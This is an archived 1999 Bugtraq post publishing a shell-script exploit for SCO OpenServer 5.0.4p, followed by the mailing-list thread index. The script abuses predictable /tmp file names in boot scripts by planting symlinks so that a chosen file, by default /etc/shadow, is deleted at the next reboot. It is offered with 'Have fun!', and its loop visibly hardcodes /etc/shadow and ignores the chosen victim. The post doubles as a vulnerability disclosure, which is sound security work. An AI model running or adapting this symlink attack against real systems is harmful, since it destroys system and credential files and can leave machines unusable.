Bugtraq mailing list archives
Little exploit for startup scripts (SCO 5.0.4p).
From: leshka () LESHKA CHUVASHIA SU (leshka)
Date: Sun, 7 Mar 1999 15:07:23 +0300
#!/bin/sh
#
# ... The punishment for inobedience ...
# (Cycle # 2)
#
# This simple script can help to erase any file
# (SCO OpenServer Enterprise System v 5.0.4p).
# Have fun !
#
#
#
#
# Some of "/etc/rc2.d" startup scripts create and then delete temporary files
# with easily predictable names in "/tmp" directory. Below there is a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
# /bin/rm -f /tmp/rpc.err$$
# ...
# rm -rf /tmp/rpc$$
#
# S95nis:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
# /bin/rm -f /tmp/nis.err$$
# ...
# rm -f /tmp/nis$$
#
# S85tcp:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
# /bin/rm -f /tmp/ps.err$$
# ...
# /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
# /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
# /bin/rm -f /tmp/nfs.err$$
# ...
# rm -f /tmp/nfs$$
#
# Every time during the startup such shell scripts creates files with names
# that include a process number of the above shell script. My numerous tests
# showed that the number is always the same with every reboot. Pretty good,
# isn't it? One problem: how to determine the process number of such script?
# It's so simple! Child processes of this script have PID's with values
# slightly over than the parent's PID. A little math and one gets it. Next
# step is creating a few symbolic links to the victime file in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S. Looking forward to getting published a complete SCO's list of names
# of such perfect shell scripts.
#
# 999,99*2
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru)
#
#
#
if [ _$1 = "_" ]
then
{
echo -n "File to delete [/etc/shadow]:"
read victim_file
if [ _$victim_file = "_" ]
then
victim_file="/etc/shadow"
fi
}
else
victim_file=$1
fi
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
do
pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
Current thread:
- Re: Linux /usr/bin/gnuplot overflow, (continued)
- Re: Linux /usr/bin/gnuplot overflow Andrea Arcangeli (Mar 05)
- buffer overflow in /usr/bin/cancel Josh A. Strickland (Mar 05)
- Re: Linux /usr/bin/gnuplot overflow -- SuSE hasnt fixed lsof Mario Lorenz (Mar 05)
- Update to Microsoft Security Bulletin (MS99-006) aleph1 () UNDERGROUND ORG (Mar 05)
- More Internet Explorer zone confusion Jim Paris (Mar 05)
- Re: More Internet Explorer zone confusion Walt Armour (Mar 08)
- Re: More Internet Explorer zone confusion Jeremy Nimmer (Mar 08)
- Re: More Internet Explorer zone confusion Jim Paris (Mar 08)
- ISAPI Extension vulnerability allows to execute code as SYSTEM Aleph One (Mar 08)
- Re: More Internet Explorer zone confusion David E. Smith (Mar 08)
- Little exploit for startup scripts (SCO 5.0.4p). leshka (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Peter van Dijk (Mar 07)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Taneli Leppä (Mar 08)
- Call for Papers: CQRE Detlef Hühnlein (Mar 08)
- Re: Little exploit for startup scripts (SCO 5.0.4p). Jon Coyle (Mar 08)